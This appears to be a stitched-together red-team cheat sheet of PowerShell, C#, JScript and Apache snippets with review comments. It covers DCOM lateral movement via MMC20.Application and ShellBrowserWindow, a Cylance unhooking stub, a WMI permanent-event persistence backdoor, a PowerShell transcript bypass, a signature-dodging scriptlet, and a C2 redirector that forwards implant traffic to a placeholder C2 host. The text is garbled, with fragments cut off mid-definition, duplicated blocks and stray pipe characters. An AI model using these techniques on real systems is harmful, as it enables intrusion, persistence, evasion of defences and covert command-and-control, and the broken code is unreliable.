Add-Type -TypeDefinition @" | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
public static class Advapi32 | |
{ | |
[DllImport("advapi32.dll", SetLastError = true)]
// LogonUser: asks LSA for a primary/impersonation token for the given credentials; on success
// phToken receives the handle (the caller owns it and must CloseHandle it). dwLogonType is
// presumably LOGON32_LOGON_NEW_CREDENTIALS (9) for a "netonly"-style token — the call site is
// outside this view, confirm there.
// NOTE(review): no CharSet is given, so the three strings marshal as ANSI (LogonUserA); set
// CharSet = CharSet.Unicode to avoid lossy conversion of non-ASCII passwords. A managed string
// password cannot be zeroed after use — prefer a SecureString/IntPtr overload if that matters.
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken);
[DllImport("advapi32.dll", SetLastError=true)] |
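// DCOM lateral-movement primitives: activate an out-of-process COM server on a (remote) host
// and call an exposed method that ends up running a command. Both calls presumably need the
// caller to be a local Administrator on the target and DCOM reachable (TCP/135 + RPC range).
// Fix: the original "#" comment lines are not valid C# (they parse as preprocessor directives),
// and the target host was hard-coded twice; it is now a single variable.
// NOTE(review): target is localhost here; set it to the remote host when using this for real.
string target = "127.0.0.1";

// MMC20.Application (tested: Windows 7, Windows 10, Server 2012R2).
// ExecuteShellCommand(Command, Directory, Parameters, WindowState). The "7" WindowState mirrors
// the published technique (presumably a minimised window) — verify against the MMC docs.
dynamic mmc = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", target));
mmc.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe", null, "/c notepad.exe", "7");
// Detection: svchost.exe -k DcomLaunch (parent cmdline) -> mmc.exe (process) -> cmd.exe child.

// ShellBrowserWindow (tested: Windows 10, Server 2012R2).
// ShellExecute(File, Args, Dir, Operation, Show); Show = 0 hides the window.
Type shellBrowserWindow = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), target);
dynamic shell = Activator.CreateInstance(shellBrowserWindow);
shell.Document.Application.ShellExecute("notepad.exe", "", "c:\\windows", null, 0);
// Detection: presumably explorer.exe (the host of this class) spawning an unexpected child — confirm.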
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
// memcpy(dest, src, count) with src declared as a managed string: the marshaler copies the
// string into a temporary buffer (ANSI, since no CharSet is set) and passes that pointer, so
// `count` must not exceed the marshalled string's byte length or memcpy over-reads the temp
// buffer. dest is presumably a code page in the hooked module, which must already be writable
// (VirtualProtect) — the caller is outside this view, confirm there.
public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
[DllImport("kernel32")]
// GetProcAddress: resolves an export by name in an already-loaded module. Returns IntPtr.Zero
// on failure; without SetLastError = true the Win32 error code is not captured, so callers can
// only check for zero. procName marshals as ANSI, which is what the API expects.
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
# WMI permanent event subscription (persistence): an __EventFilter that fires when the local
# clock reads 09:30 (polled every 60 s), a CommandLineEventConsumer that launches PowerShell,
# and the __FilterToConsumerBinding that wires the two together.
# All three objects live in root\subscription and are what defenders enumerate
# (Get-WmiObject -Namespace root\subscription -Class __EventFilter / CommandLineEventConsumer /
# __FilterToConsumerBinding), so the names and the command line are the indicators here.
$timerFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{
    name           = 'IEUpdateNOW'
    EventNameSpace = 'root\CimV2'
    QueryLanguage  = "WQL"
    Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"
}

$cmdConsumer = Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{
    name                = 'IEUpdateNOW'
    CommandLineTemplate = "powershell -e blah"
    RunInteractively    = 'false'
}

Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{
    Filter   = $timerFilter
    Consumer = $cmdConsumer
}
# Reference: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
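# Print the current token's identity, then every group SID in the token resolved to an
# NTAccount name ("whoami /groups" equivalent).
# Fix: SecurityIdentifier.Translate() throws IdentityNotMappedException for SIDs that have no
# account name (e.g. the per-logon-session SID, or groups from an unreachable domain). The
# original expression errored on those rows and left the cell blank; fall back to the raw SID
# string so no group is lost from the listing.
([Security.Principal.WindowsIdentity]::GetCurrent());

$groupColumn = @{
    Label      = "Group Name"
    Width      = 400
    Expression = {
        # Capture the SID before the try/catch: inside catch, $_ is the ErrorRecord.
        $sid = $_.Value
        try {
            (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value
        } catch [System.Security.Principal.IdentityNotMappedException] {
            $sid
        }
    }
}

([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | Format-Table $groupColumn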
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Security; | |
using System.Management.Automation.Runspaces; | |
using System.Reflection; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 |
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 | |
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll | |
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll |
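# Dump the ACL of every file and directory under C:\ to a CSV for offline review of weak
# permissions. Best effort: unreadable paths are skipped, never fatal.
# Fixes:
#  - -LiteralPath: names containing [ ] are wildcard metacharacters to -Path, so the original
#    silently dropped (or mis-resolved) those entries.
#  - Get-Acl's access-denied errors are typically non-terminating, so the original try/catch
#    never caught them — they were printed to the error stream, not swallowed. -ErrorAction
#    SilentlyContinue gives the intended best-effort behaviour explicitly.
# NOTE(review): without -Force, hidden and system items are not walked; add it if the audit
# must cover them.
Get-ChildItem -LiteralPath 'C:\' -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue |
            Select-Object pschildname, pspath, accesstostring
    } |
    Export-Csv -LiteralPath 'C:\temp\acl.csv' -NoTypeInformation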
<cOmPoNeNt><sCRipT>
// Minimal Windows Script Component body: launches calc.exe through Shell.Application.
// ShellExecute(File, Args, Dir, Operation, Show): verb "open", Show "0" = hidden window.
// The tag casing is mixed, presumably to dodge case-sensitive signatures; no language
// attribute is given, so the host is assumed to default to JScript here — verify.
var shellApp = new ActiveXObject("Shell.Application");
a = shellApp.ShellExecute("calc.exe", "", "", "open", "0");
</sCRipT></cOmPoNeNt>
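# Selective reverse proxy (C2 redirector): a request is proxied to the C2 server under /news/
# only when its source IP is in the whitelist map AND its User-Agent matches the implant UA;
# everything else falls through to the decoy site served by this vhost.
#
# /opt/whitelist.txt is a txt RewriteMap, one "key value" pair per line; the key is the client
# IP and the value is unused here (hence "-"):
#   104.44.44.44 -
#   104.33.33.33 -
#
# Fix: mod_rewrite is off unless enabled, and mod_proxy refuses to forward to an https://
# backend unless the SSL proxy engine is on — both are now set explicitly (harmless if an
# enclosing config already sets them).
#
# NOTE(review): the doubled "%%{...}" only makes sense if this file is emitted through a
# %-format template; in a config Apache reads directly it must be "%{REMOTE_ADDR}" and
# "%{HTTP_USER_AGENT}", otherwise the lookups never expand and the rule never fires.
# NOTE(review): REMOTE_ADDR is the TCP peer; behind a CDN or load balancer that is the proxy's
# address, so the whitelist must be keyed on the forwarded client IP (mod_remoteip) instead.
# NOTE(review): the UA regex is unanchored, so any UA containing that prefix (e.g. real Chrome
# on Windows 7 x64) passes — the IP whitelist is the only real gate.
RewriteEngine On
SSLProxyEngine On
RewriteMap ips txt:/opt/whitelist.txt
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]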